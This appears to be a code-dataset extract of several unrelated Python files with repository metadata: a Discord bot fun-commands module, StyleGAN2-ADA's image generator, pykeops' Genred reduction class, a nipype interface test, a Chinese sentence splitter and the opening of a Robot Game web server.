)
print(f'MAKING exitStopOptionList ON moveExit {movement["forceX"]}')
exit_stop_matching_data_list = identify_matching_movement(
exit_stop_starting_data_list,
EXIT_STOP_LIST
)
print(f'SAVING exitStopOptionList ON moveExit {movement["forceX"]}')
save_matching_movement(
movement,
exit_stop_matching_data_list,
'exitStopOptionList',
EXIT_STOP_LIST
)
for iterator_z in range(int(iterator_z_max) + 1):
position_z = round(MIN_TARGET_Z + (STEP_Z * iterator_z), 2)
if len(movement['exitStopOptionList'][position_z].keys()) == 0:
print(f'FAILURE: {position_z} !!!!!')
else:
print(f'SUCCESS: {position_z}')
def save_movement_to_json_file():
with open(MOVEMENT_JSON_FILENAME, 'w') as movement_file:
json.dump({
'moveExit': MOVE_EXIT_LIST,
'deepExit': DEEP_EXIT_LIST,
'tossExit': TOSS_EXIT_LIST,
'moveStop': MOVE_STOP_LIST,
'deepStop': DEEP_STOP_LIST,
'tossStop': TOSS_STOP_LIST,
}, movement_file)
def main():
print('GENERATING PASSIVE INTUITIVE PHYSICS MOVEMENT (PLEASE WAIT)...')
mark_stop_step()
mark_land_step()
make_each_full_option_list()
save_movement_to_json_file()
print('FINISHED GENERATING MOVEMENT')
if __name__ == '__main__':
main()
| 39.326848
| 79
| 0.605125
|
51da0d12e5b0ee288bfeed2d2f7e52a6f05ec06b
| 2,372
|
py
|
Python
|
modules/miscellaneous.py
|
DMCTruong/MoosikBot
|
d00e231ab4d3beed8e1b454bff0400bee3d8c823
|
[
"MIT"
] | 1
|
2017-08-07T02:36:39.000Z
|
2017-08-07T02:36:39.000Z
|
modules/miscellaneous.py
|
DMCTruong/Discord-Bot
|
d00e231ab4d3beed8e1b454bff0400bee3d8c823
|
[
"MIT"
] | null | null | null |
modules/miscellaneous.py
|
DMCTruong/Discord-Bot
|
d00e231ab4d3beed8e1b454bff0400bee3d8c823
|
[
"MIT"
] | null | null | null |
##########################################################################################
# Program Name : Discord Bot
# Author : DMCTruong
# Last Updated : August 31, 2017
# License : MIT
# Description : A general purpose bot written for Discord
##########################################################################################
import discord
from discord.ext import commands
import asyncio
import configurations
import random
from random import randint
import time
bot = commands.Bot(configurations.PREFIX)
eightBallResponses = [
"Sure, go for it!",
"Sure but I'm not entirely certain",
"Perhaps?",
"No, that's a terrible idea!",
]
class Miscellaneous:
def __init__(self, bot):
self.bot = bot
@bot.command(pass_context=True, aliases=["8ball"])
async def ask(self, ctx):
"""Ask the bot a yes/no/maybe question."""
random.seed(time.time())
askResponse = eightBallResponses[random.randrange(len(eightBallResponses))]
print(ctx.message.author.mention + " " + askResponse)
await self.bot.say(ctx.message.author.mention + " " + askResponse)
@bot.command(pass_context=True)
async def hug(self, ctx, *, member: discord.Member=None):
"""Give someone or yourself a hug!"""
generate_hug = randint(1, 16)
gif_url = "https://dmctruong.000webhostapp.com/.Discord/gifs-hugs/hug" + str(generate_hug) + ".gif"
if member is None:
print("*hugs* " + gif_url)
await self.bot.say("*hugs*\n" + gif_url)
else:
if member.id == ctx.message.author.id:
print("*hugs* " + gif_url)
await self.bot.say("*hugs*\n" + gif_url)
else:
print(ctx.message.author.mention + " gave " + member.mention + " a hug! " + gif_url)
await self.bot.say(ctx.message.author.mention + " gave " + member.mention + " a hug!\n" + gif_url)
@bot.command(pass_context=True)
async def pick(self, ctx, *, choices: str):
"""Pick between given choices"""
choicesArr = choices.split(" or ")
chosen = choicesArr[random.randrange(len(choicesArr))]
print(ctx.message.author.mention + ": I choose " + chosen)
await self.bot.say(ctx.message.author.mention + ": I choose " + chosen)
| 37.650794
| 114
| 0.563238
|
c982d802edaa443c07a8c6c9d750627fd0a36f3f
| 5,502
|
py
|
Python
|
generate.py
|
NILOIDE/stylegan2-ada-pytorch
|
7a3f2f4e1e7aa38a78e34c0f6a16297e8704cef7
|
[
"BSD-Source-Code"
] | null | null | null |
generate.py
|
NILOIDE/stylegan2-ada-pytorch
|
7a3f2f4e1e7aa38a78e34c0f6a16297e8704cef7
|
[
"BSD-Source-Code"
] | null | null | null |
generate.py
|
NILOIDE/stylegan2-ada-pytorch
|
7a3f2f4e1e7aa38a78e34c0f6a16297e8704cef7
|
[
"BSD-Source-Code"
] | null | null | null |
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
"""Generate images using pretrained network pickle."""
import os
import re
from typing import List, Optional
import click
import dnnlib
import numpy as np
import PIL.Image
import torch
from pathlib import Path
import legacy
#----------------------------------------------------------------------------
def num_range(s: str) -> List[int]:
'''Accept either a comma separated list of numbers 'a,b,c' or a range 'a-c' and return as a list of ints.'''
range_re = re.compile(r'^(\d+)-(\d+)$')
m = range_re.match(s)
if m:
return list(range(int(m.group(1)), int(m.group(2))+1))
vals = s.split(',')
return [int(x) for x in vals]
#----------------------------------------------------------------------------
@click.command()
@click.pass_context
@click.option('--network', 'network_pkl', help='Network pickle filename', required=True)
@click.option('--seeds', type=num_range, help='List of random seeds')
@click.option('--trunc', 'truncation_psi', type=float, help='Truncation psi', default=1, show_default=True)
@click.option('--class', 'class_idx', type=int, help='Class label (unconditional if not specified)')
@click.option('--noise-mode', help='Noise mode', type=click.Choice(['const', 'random', 'none']), default='const', show_default=True)
@click.option('--projected-w', help='Projection result file', type=str, metavar='FILE')
@click.option('--outdir', help='Where to save the output images', type=str, required=True, metavar='DIR')
def generate_images(
ctx: click.Context,
network_pkl: str,
seeds: Optional[List[int]],
truncation_psi: float,
noise_mode: str,
outdir: str,
class_idx: Optional[int],
projected_w: Optional[str]
):
"""Generate images using pretrained network pickle.
Examples:
\b
# Generate curated MetFaces images without truncation (Fig.10 left)
python generate.py --outdir=out --trunc=1 --seeds=85,265,297,849 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate uncurated MetFaces images with truncation (Fig.12 upper left)
python generate.py --outdir=out --trunc=0.7 --seeds=600-605 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate class conditional CIFAR-10 images (Fig.17 left, Car)
python generate.py --outdir=out --seeds=0-35 --class=1 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/cifar10.pkl
\b
# Render an image from projected W
python generate.py --outdir=out --projected_w=projected_w.npz \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
"""
print('Loading networks from "%s"...' % network_pkl)
device = torch.device('cuda')
with dnnlib.util.open_url(network_pkl) as f:
G = legacy.load_network_pkl(f)['G_ema'].to(device) # type: ignore
sub_dir = str(Path(network_pkl).parts[-1])[:-4]
outdir = str(Path(outdir) / f"generated_{sub_dir}")
print("Saving to:", outdir)
os.makedirs(outdir, exist_ok=True)
# Synthesize the result of a W projection.
if projected_w is not None:
if seeds is not None:
print ('warn: --seeds is ignored when using --projected-w')
print(f'Generating images from projected W "{projected_w}"')
ws = np.load(projected_w)['w']
ws = torch.tensor(ws, device=device) # pylint: disable=not-callable
assert ws.shape[1:] == (G.num_ws, G.w_dim)
for idx, w in enumerate(ws):
img = G.synthesis(w.unsqueeze(0), noise_mode=noise_mode)
img = (img.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to(torch.uint8)
img = PIL.Image.fromarray(img[0].cpu().numpy(), 'RGB').save(f'{outdir}/proj{idx:02d}.png')
return
if seeds is None:
ctx.fail('--seeds option is required when not using --projected-w')
# Labels.
label = torch.zeros([1, G.c_dim], device=device)
if G.c_dim != 0:
if class_idx is None:
ctx.fail('Must specify class label with --class when using a conditional network')
label[:, class_idx] = 1
else:
if class_idx is not None:
print ('warn: --class=lbl ignored when running on an unconditional network')
# Generate images.
for seed_idx, seed in enumerate(seeds):
print('Generating image for seed %d (%d/%d) ...' % (seed, seed_idx, len(seeds)))
z = torch.from_numpy(np.random.RandomState(seed).randn(1, G.z_dim)).to(device)
img = G(z, label, truncation_psi=truncation_psi, noise_mode=noise_mode)
img = (img.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to(torch.uint8)
PIL.Image.fromarray(img[0].cpu().numpy(), 'RGB').save(f'{outdir}/seed{seed:04d}.jpg')
#----------------------------------------------------------------------------
if __name__ == "__main__":
generate_images() # pylint: disable=no-value-for-parameter
#----------------------------------------------------------------------------
| 41.368421
| 132
| 0.631952
|
d1571512bdaae08e093a5df7b641d32f6f852bfe
| 1,398
|
py
|
Python
|
edexOsgi/com.raytheon.uf.common.dataplugin.gfe/pythonPackages/dynamicserialize/dstypes/com/raytheon/uf/common/dataplugin/gfe/slice/WeatherGridSlice.py
|
srcarter3/awips2
|
37f31f5e88516b9fd576eaa49d43bfb762e1d174
|
[
"Apache-2.0"
] | null | null | null |
edexOsgi/com.raytheon.uf.common.dataplugin.gfe/pythonPackages/dynamicserialize/dstypes/com/raytheon/uf/common/dataplugin/gfe/slice/WeatherGridSlice.py
|
srcarter3/awips2
|
37f31f5e88516b9fd576eaa49d43bfb762e1d174
|
[
"Apache-2.0"
] | null | null | null |
edexOsgi/com.raytheon.uf.common.dataplugin.gfe/pythonPackages/dynamicserialize/dstypes/com/raytheon/uf/common/dataplugin/gfe/slice/WeatherGridSlice.py
|
srcarter3/awips2
|
37f31f5e88516b9fd576eaa49d43bfb762e1d174
|
[
"Apache-2.0"
] | 1
|
2021-10-30T00:03:05.000Z
|
2021-10-30T00:03:05.000Z
|
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
# File auto-generated against equivalent DynamicSerialize Java class
from dynamicserialize.dstypes.com.raytheon.uf.common.dataplugin.gfe.slice import AbstractGridSlice
class WeatherGridSlice(AbstractGridSlice):
def __init__(self):
super(WeatherGridSlice, self).__init__()
self.weatherGrid = None
self.keys = []
def getNumPyGrid(self):
pass
def getWeatherGrid(self):
return self.weatherGrid
def setWeatherGrid(self, weatherGrid):
self.weatherGrid = weatherGrid
def getKeys(self):
return self.keys
def setKeys(self, keys):
self.keys = keys
| 29.744681
| 98
| 0.680258
|
6883b815aa54ee7552dd33912fb6b490f1ddc978
| 1,447
|
py
|
Python
|
Plugins/Extensions/GetChinese/SplitSentence.py
|
yingshaoxo/xiaoya
|
559ff798dfc1016e3d04a69d86d035b1dec70b57
|
[
"MIT"
] | 1
|
2021-02-24T02:41:31.000Z
|
2021-02-24T02:41:31.000Z
|
Plugins/Extensions/GetChinese/SplitSentence.py
|
yingshaoxo/Xiaoya
|
559ff798dfc1016e3d04a69d86d035b1dec70b57
|
[
"MIT"
] | null | null | null |
Plugins/Extensions/GetChinese/SplitSentence.py
|
yingshaoxo/Xiaoya
|
559ff798dfc1016e3d04a69d86d035b1dec70b57
|
[
"MIT"
] | null | null | null |
import re
def handle_break(obj):
text = obj.group(0)
if re.match(r'^\s+$', text)==None:
return re.sub(r'\s*', '', text)
else:
return text
def fix_break(text):
text = re.sub(r'[^。!?…;:”"》】]\s+', handle_break, text)
return text
def list_to_text(_list, num_of_line):
text = ''
for num, i in enumerate(_list, start=1):
if num % num_of_line != 0:
text += i + '\n'
else:
text += i + '\n\n'
return text
def handle(obj):
text = obj.group(0)
text = text.strip(' \n ')
return text + '\n'*2
def handle_no_space(obj):
text = obj.group(0)
return re.sub(r'\s*', '', text)
def split_sentence(text):
text = fix_break(text)
text = re.sub(r'((.*?)(?<!B|A)([!?。]))', handle, text)
text = re.sub(r'“(\\.|[^“”])*”', handle_no_space, text)
text = re.sub(r':(\\.|[^:“])*“', handle_no_space, text)
a_list = text.split('\n')
a_list = [i.strip(' \n ') for i in a_list if re.match(r'^\s*$', i) == None]
text = list_to_text(a_list, 1)
return text.strip(' \n ')
def main(text):
return split_sentence(text)
"""
text = '''
坊市制主要表现为将住宅区(坊)和交易区(市)严格分开,并用法律和制度对交易的时间和地点进行严加控制。坊市制度将商业区和居住区分开,居住区内禁止经商。唐代后期,开始打破市坊制,也不再限制商品交易的时间。
在繁华城市不论白天
还是夜晚,集市贸易都
相当发达。唐代中期,随着农业、手工业的不
断发展,商业出现了新的繁荣局面,单靠白天的市场交换商品显然已不
能适应,于是夜市正式出现。
当时文人的诗作里出现过“夜市千灯照碧云,高楼红袖客纷纷。
水门向晚茶商闹,桥市通宵酒客行。
”
'''
print(split_sentence(text))
"""
| 20.671429
| 100
| 0.574292
|
49996320e67c38315400c72ba8fbad38a6ffb5af
| 16,969
|
py
|
Python
|
pykeops/numpy/generic/generic_red.py
|
kshitij12345/keops
|
fcc6c77bd1caa52787df4e58d76b8bbe94f4f7a1
|
[
"MIT"
] | 1
|
2021-04-20T09:04:21.000Z
|
2021-04-20T09:04:21.000Z
|
pykeops/numpy/generic/generic_red.py
|
kshitij12345/keops
|
fcc6c77bd1caa52787df4e58d76b8bbe94f4f7a1
|
[
"MIT"
] | null | null | null |
pykeops/numpy/generic/generic_red.py
|
kshitij12345/keops
|
fcc6c77bd1caa52787df4e58d76b8bbe94f4f7a1
|
[
"MIT"
] | null | null | null |
import numpy as np
from pykeops.common.get_options import get_tag_backend
from pykeops.common.keops_io import LoadKeOps
from pykeops.common.operations import preprocess, postprocess
from pykeops.common.parse_type import get_sizes, complete_aliases, get_optional_flags
from pykeops.common.utils import axis2cat
from pykeops.numpy import default_dtype
class Genred:
r"""
Creates a new generic operation.
This is KeOps' main function, whose usage is documented in
the :doc:`user-guide <../../Genred>`,
the :doc:`gallery of examples <../../../_auto_examples/index>`
and the :doc:`high-level tutorials <../../../_auto_tutorials/index>`.
Taking as input a handful of strings and integers that specify
a custom Map-Reduce operation, it returns a C++ wrapper
that can be called just like any other NumPy function.
Note:
On top of the **Sum** and **LogSumExp** reductions, KeOps
supports
:ref:`variants of the ArgKMin reduction <part.reduction>`
that can be used
to implement k-nearest neighbor search.
These routines return indices encoded as **floating point numbers**, and
produce no gradient. Fortunately though, you can simply
turn them into ``LongTensors`` and use them to index
your arrays, as showcased in the documentation
of :func:`generic_argmin() <pykeops.numpy.generic_argmin>`, :func:`generic_argkmin() <pykeops.numpy.generic_argkmin>` and in the
:doc:`K-means tutorial <../../../_auto_tutorials/kmeans/plot_kmeans_numpy>`.
Example:
>>> my_conv = Genred('Exp(-SqNorm2(x - y))', # formula
... ['x = Vi(3)', # 1st input: dim-3 vector per line
... 'y = Vj(3)'], # 2nd input: dim-3 vector per column
... reduction_op='Sum', # we also support LogSumExp, Min, etc.
... axis=1) # reduce along the lines of the kernel matrix
>>> # Apply it to 2d arrays x and y with 3 columns and a (huge) number of lines
>>> x = np.random.randn(1000000, 3)
>>> y = np.random.randn(2000000, 3)
>>> a = my_conv(x, y) # a_i = sum_j exp(-|x_i-y_j|^2)
>>> print(a.shape)
[1000000, 1]
"""
def __init__(
self,
formula,
aliases,
reduction_op="Sum",
axis=0,
dtype=default_dtype,
opt_arg=None,
formula2=None,
cuda_type=None,
dtype_acc="auto",
use_double_acc=False,
sum_scheme="auto",
enable_chunks=True,
optional_flags=[],
rec_multVar_highdim=None,
):
r"""
Instantiate a new generic operation.
Note:
:class:`Genred` relies on C++ or CUDA kernels that are compiled on-the-fly,
and stored in a :ref:`cache directory <part.cache>` as shared libraries (".so" files) for later use.
Args:
formula (string): The scalar- or vector-valued expression
that should be computed and reduced.
The correct syntax is described in the :doc:`documentation <../../Genred>`,
using appropriate :doc:`mathematical operations <../../../api/math-operations>`.
aliases (list of strings): A list of identifiers of the form ``"AL = TYPE(DIM)"``
that specify the categories and dimensions of the input variables. Here:
- ``AL`` is an alphanumerical alias, used in the **formula**.
- ``TYPE`` is a *category*. One of:
- ``Vi``: indexation by :math:`i` along axis 0.
- ``Vj``: indexation by :math:`j` along axis 1.
- ``Pm``: no indexation, the input tensor is a *vector* and not a 2d array.
- ``DIM`` is an integer, the dimension of the current variable.
As described below, :meth:`__call__` will expect as input Tensors whose
shape are compatible with **aliases**.
Keyword Args:
reduction_op (string, default = ``"Sum"``): Specifies the reduction
operation that is applied to reduce the values
of ``formula(x_i, y_j, ...)`` along axis 0 or axis 1.
The supported values are one of :ref:`part.reduction`
axis (int, default = 0): Specifies the dimension of the "kernel matrix" that is reduced by our routine.
The supported values are:
- **axis** = 0: reduction with respect to :math:`i`, outputs a ``Vj`` or ":math:`j`" variable.
- **axis** = 1: reduction with respect to :math:`j`, outputs a ``Vi`` or ":math:`i`" variable.
dtype (string, default = ``"float64"``): Specifies the numerical ``dtype`` of the input and output arrays.
The supported values are:
- **dtype** = ``"float32"``.
- **dtype** = ``"float64"``.
opt_arg (int, default = None): If **reduction_op** is in ``["KMin", "ArgKMin", "KMinArgKMin"]``,
this argument allows you to specify the number ``K`` of neighbors to consider.
dtype_acc (string, default ``"auto"``): type for accumulator of reduction, before casting to dtype.
It improves the accuracy of results in case of large sized data, but is slower.
Default value "auto" will set this option to the value of dtype. The supported values are:
- **dtype_acc** = ``"float16"`` : allowed only if dtype is "float16".
- **dtype_acc** = ``"float32"`` : allowed only if dtype is "float16" or "float32".
- **dtype_acc** = ``"float64"`` : allowed only if dtype is "float32" or "float64"..
use_double_acc (bool, default False): same as setting dtype_acc="float64" (only one of the two options can be set)
If True, accumulate results of reduction in float64 variables, before casting to float32.
This can only be set to True when data is in float32 or float64.
It improves the accuracy of results in case of large sized data, but is slower.
sum_scheme (string, default ``"auto"``): method used to sum up results for reductions. This option may be changed only
when reduction_op is one of: "Sum", "MaxSumShiftExp", "LogSumExp", "Max_SumShiftExpWeight", "LogSumExpWeight", "SumSoftMaxWeight".
Default value "auto" will set this option to "block_red" for these reductions. Possible values are:
- **sum_scheme** = ``"direct_sum"``: direct summation
- **sum_scheme** = ``"block_sum"``: use an intermediate accumulator in each block before accumulating in the output. This improves accuracy for large sized data.
- **sum_scheme** = ``"kahan_scheme"``: use Kahan summation algorithm to compensate for round-off errors. This improves
accuracy for large sized data.
enable_chunks (bool, default True): enable automatic selection of special "chunked" computation mode for accelerating reductions
with formulas involving large dimension variables.
optional_flags (list, default []): further optional flags passed to the compiler, in the form ['-D...=...','-D...=...']
"""
if cuda_type:
# cuda_type is just old keyword for dtype, so this is just a trick to keep backward compatibility
dtype = cuda_type
if dtype in ("float16", "half"):
raise ValueError(
"[KeOps] Float16 type is only supported with PyTorch tensors inputs."
)
self.reduction_op = reduction_op
reduction_op_internal, formula2 = preprocess(reduction_op, formula2)
if rec_multVar_highdim is not None:
optional_flags += ["-DMULT_VAR_HIGHDIM=1"]
self.optional_flags = optional_flags + get_optional_flags(
reduction_op_internal,
dtype_acc,
use_double_acc,
sum_scheme,
dtype,
enable_chunks,
)
str_opt_arg = "," + str(opt_arg) if opt_arg else ""
str_formula2 = "," + formula2 if formula2 else ""
self.formula = (
reduction_op_internal
+ "_Reduction("
+ formula
+ str_opt_arg
+ ","
+ str(axis2cat(axis))
+ str_formula2
+ ")"
)
self.aliases = complete_aliases(self.formula, aliases)
self.dtype = dtype
self.myconv = LoadKeOps(
self.formula, self.aliases, self.dtype, "numpy", self.optional_flags
).import_module()
self.axis = axis
self.opt_arg = opt_arg
def __call__(self, *args, backend="auto", device_id=-1, ranges=None):
r"""
Apply the routine on arbitrary NumPy arrays.
.. warning::
Even for variables of size 1 (e.g. :math:`a_i\in\mathbb{R}`
for :math:`i\in[0,M)`), KeOps expects inputs to be formatted
as 2d Tensors of size ``(M,dim)``. In practice,
``a.view(-1,1)`` should be used to turn a vector of weights
into a *list of scalar values*.
Args:
*args (2d arrays (variables ``Vi(..)``, ``Vj(..)``) and 1d arrays (parameters ``Pm(..)``)): The input numerical arrays,
which should all have the same ``dtype``, be **contiguous** and be stored on
the **same device**. KeOps expects one array per alias,
with the following compatibility rules:
- All ``Vi(Dim_k)`` variables are encoded as **2d-arrays** with ``Dim_k`` columns and the same number of lines :math:`M`.
- All ``Vj(Dim_k)`` variables are encoded as **2d-arrays** with ``Dim_k`` columns and the same number of lines :math:`N`.
- All ``Pm(Dim_k)`` variables are encoded as **1d-arrays** (vectors) of size ``Dim_k``.
Keyword Args:
backend (string): Specifies the map-reduce scheme.
The supported values are:
- ``"auto"`` (default): let KeOps decide which backend is best suited to your data, based on the tensors' shapes. ``"GPU_1D"`` will be chosen in most cases.
- ``"CPU"``: use a simple C++ ``for`` loop on a single CPU core.
- ``"GPU_1D"``: use a `simple multithreading scheme <https://github.com/getkeops/keops/blob/master/keops/core/GpuConv1D.cu>`_ on the GPU - basically, one thread per value of the output index.
- ``"GPU_2D"``: use a more sophisticated `2D parallelization scheme <https://github.com/getkeops/keops/blob/master/keops/core/GpuConv2D.cu>`_ on the GPU.
- ``"GPU"``: let KeOps decide which one of the ``"GPU_1D"`` or the ``"GPU_2D"`` scheme will run faster on the given input.
device_id (int, default=-1): Specifies the GPU that should be used
to perform the computation; a negative value lets your system
choose the default GPU. This parameter is only useful if your
system has access to several GPUs.
ranges (6-uple of integer arrays, None by default):
Ranges of integers that specify a
:doc:`block-sparse reduction scheme <../../sparsity>`
with *Mc clusters along axis 0* and *Nc clusters along axis 1*.
If None (default), we simply loop over all indices
:math:`i\in[0,M)` and :math:`j\in[0,N)`.
**The first three ranges** will be used if **axis** = 1
(reduction along the axis of ":math:`j` variables"),
and to compute gradients with respect to ``Vi(..)`` variables:
- ``ranges_i``, (Mc,2) integer array - slice indices
:math:`[\operatorname{start}^I_k,\operatorname{end}^I_k)` in :math:`[0,M]`
that specify our Mc blocks along the axis 0
of ":math:`i` variables".
- ``slices_i``, (Mc,) integer array - consecutive slice indices
:math:`[\operatorname{end}^S_1, ..., \operatorname{end}^S_{M_c}]`
that specify Mc ranges :math:`[\operatorname{start}^S_k,\operatorname{end}^S_k)` in ``redranges_j``,
with :math:`\operatorname{start}^S_k = \operatorname{end}^S_{k-1}`.
**The first 0 is implicit**, meaning that :math:`\operatorname{start}^S_0 = 0`, and we typically expect that
``slices_i[-1] == len(redrange_j)``.
- ``redranges_j``, (Mcc,2) integer array - slice indices
:math:`[\operatorname{start}^J_\ell,\operatorname{end}^J_\ell)` in :math:`[0,N]`
that specify reduction ranges along the axis 1
of ":math:`j` variables".
If **axis** = 1, these integer arrays allow us to say that ``for k in range(Mc)``, the output values for
indices ``i in range( ranges_i[k,0], ranges_i[k,1] )`` should be computed using a Map-Reduce scheme over
indices ``j in Union( range( redranges_j[l, 0], redranges_j[l, 1] ))`` for ``l in range( slices_i[k-1], slices_i[k] )``.
**Likewise, the last three ranges** will be used if **axis** = 0
(reduction along the axis of ":math:`i` variables"),
and to compute gradients with respect to ``Vj(..)`` variables:
- ``ranges_j``, (Nc,2) integer array - slice indices
:math:`[\operatorname{start}^J_k,\operatorname{end}^J_k)` in :math:`[0,N]`
that specify our Nc blocks along the axis 1
of ":math:`j` variables".
- ``slices_j``, (Nc,) integer array - consecutive slice indices
:math:`[\operatorname{end}^S_1, ..., \operatorname{end}^S_{N_c}]`
that specify Nc ranges :math:`[\operatorname{start}^S_k,\operatorname{end}^S_k)` in ``redranges_i``,
with :math:`\operatorname{start}^S_k = \operatorname{end}^S_{k-1}`.
**The first 0 is implicit**, meaning that :math:`\operatorname{start}^S_0 = 0`, and we typically expect that
``slices_j[-1] == len(redrange_i)``.
- ``redranges_i``, (Ncc,2) integer array - slice indices
:math:`[\operatorname{start}^I_\ell,\operatorname{end}^I_\ell)` in :math:`[0,M]`
that specify reduction ranges along the axis 0
of ":math:`i` variables".
If **axis** = 0,
these integer arrays allow us to say that ``for k in range(Nc)``, the output values for
indices ``j in range( ranges_j[k,0], ranges_j[k,1] )`` should be computed using a Map-Reduce scheme over
indices ``i in Union( range( redranges_i[l, 0], redranges_i[l, 1] ))`` for ``l in range( slices_j[k-1], slices_j[k] )``.
Returns:
(M,D) or (N,D) array:
The output of the reduction,
a **2d-tensor** with :math:`M` or :math:`N` lines (if **axis** = 1
or **axis** = 0, respectively) and a number of columns
that is inferred from the **formula**.
"""
# Get tags
tagCpuGpu, tag1D2D, _ = get_tag_backend(backend, args)
if ranges is None:
ranges = () # To keep the same type
# N.B.: KeOps C++ expects contiguous integer arrays as ranges
ranges = tuple(np.ascontiguousarray(r) for r in ranges)
nx, ny = get_sizes(self.aliases, *args)
nout, nred = (nx, ny) if self.axis == 1 else (ny, nx)
if "Arg" in self.reduction_op:
# when using Arg type reductions,
# if nred is greater than 16 millions and dtype=float32, the result is not reliable
# because we encode indices as floats, so we raise an exception ;
# same with float16 type and nred>2048
if nred > 1.6e7 and self.dtype in ("float32", "float"):
raise ValueError(
"size of input array is too large for Arg type reduction with single precision. Use double precision."
)
elif nred > 2048 and self.dtype in ("float16", "half"):
raise ValueError(
"size of input array is too large for Arg type reduction with float16 dtype.."
)
out = self.myconv.genred_numpy(tagCpuGpu, tag1D2D, 0, device_id, ranges, *args)
return postprocess(
out, "numpy", self.reduction_op, nout, self.opt_arg, self.dtype
)
| 53.361635
| 211
| 0.573399
|
eeaef555627bd5bd522f125d985f7cd6bdc4e40e
| 1,714
|
py
|
Python
|
nipype/interfaces/afni/tests/test_auto_MaskTool.py
|
mfalkiewicz/nipype
|
775e21b78fb1ffa2ff9cb12e6f052868bd44d052
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/afni/tests/test_auto_MaskTool.py
|
mfalkiewicz/nipype
|
775e21b78fb1ffa2ff9cb12e6f052868bd44d052
|
[
"Apache-2.0"
] | null | null | null |
nipype/interfaces/afni/tests/test_auto_MaskTool.py
|
mfalkiewicz/nipype
|
775e21b78fb1ffa2ff9cb12e6f052868bd44d052
|
[
"Apache-2.0"
] | null | null | null |
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..utils import MaskTool
def test_MaskTool_inputs():
input_map = dict(args=dict(argstr='%s',
),
count=dict(argstr='-count',
position=2,
),
datum=dict(argstr='-datum %s',
),
dilate_inputs=dict(argstr='-dilate_inputs %s',
),
dilate_results=dict(argstr='-dilate_results %s',
),
environ=dict(nohash=True,
usedefault=True,
),
fill_dirs=dict(argstr='-fill_dirs %s',
requires=['fill_holes'],
),
fill_holes=dict(argstr='-fill_holes',
),
frac=dict(argstr='-frac %s',
),
ignore_exception=dict(deprecated='1.0.0',
nohash=True,
usedefault=True,
),
in_file=dict(argstr='-input %s',
copyfile=False,
mandatory=True,
position=-1,
),
inter=dict(argstr='-inter',
),
num_threads=dict(nohash=True,
usedefault=True,
),
out_file=dict(argstr='-prefix %s',
name_source='in_file',
name_template='%s_mask',
),
outputtype=dict(),
terminal_output=dict(deprecated='1.0.0',
nohash=True,
),
union=dict(argstr='-union',
),
verbose=dict(argstr='-verb %s',
),
)
inputs = MaskTool.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_MaskTool_outputs():
output_map = dict(out_file=dict(),
)
outputs = MaskTool.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
| 24.485714
| 67
| 0.618436
|
cbc383eea911c2da864498f8e92406f3e08963ca
| 50,282
|
py
|
Python
|
server.py
|
aurickq/rgserver
|
f391a686c4056ab2568cce4b8fbe31e81797ce80
|
[
"MIT"
] | null | null | null |
server.py
|
aurickq/rgserver
|
f391a686c4056ab2568cce4b8fbe31e81797ce80
|
[
"MIT"
] | null | null | null |
server.py
|
aurickq/rgserver
|
f391a686c4056ab2568cce4b8fbe31e81797ce80
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import ast
import difflib
import hashlib
import json
import math
import os
import py_compile
import random
import re
import string
import subprocess
import sys
import time
import urllib
import urlparse
import web
import web.form
import pygments
import pygments.lexers
import pygments.lexers.text
import pygments.formatters
import dbcon
import matchstate as ms
import shorten
import tools
import tplib
from rgkit.settings import settings
web.config.debug = False
CHALLENGES_LIMITS = 25
ROBOTS_LIMITS = 3
MAX_NAME_LENGTH = 25
BOT_LIMIT_REACHED_MSG = '''
Currently you can have at most {0} active robots. Disabling old bots will
allow you to create new ones. Otherwise, please create a post in the Requests
board of our community to increase your limit. It's
very easy, please don't abuse the simple registration system and
create multiple users.'''
urls = (
'/viewrobot/(\d*)', 'PageRedirectViewRobot',
'/viewuser/(\d*)', 'PageRedirectViewUser',
'/robotsource/(\d*)', 'PageRedirectRobotSource',
'/', 'PageHome',
'/directory', 'PageDirectory',
'/home', 'PageHome',
'/login', 'PageLogin',
'/logout', 'PageLogout',
'/matchlist', 'PageMatchList',
'/match/(\d*)', 'PageMatch',
'/moderate', 'PageModerate',
'/moderate/(\d*)', 'PageModerate',
'/profile/edit', 'PageProfile',
'/reg', 'PageRegister',
'/robots', 'PageRobots',
'/robot/(\d*)', 'PageViewRobot',
'/robot/(\d*)/against/(\d*)', 'PageRobotHistory',
'/robot/(\d*)/challenge', 'PageChallengeRobot',
'/robot/(\d*)/challenge/(\d*)', 'PageChallengeRobot',
'/robot/(\d*)/challenge/(\d*)/(\d*)', 'PageChallengeRobot',
'/robot/(\d*)/charts', 'PageRobotCharts',
'/robot/(\d*)/delete', 'PageDeleteRobot',
'/robot/(\d*)/disable', 'PageDisableRobot',
'/robot/(\d*)/history', 'PageRobotHistory',
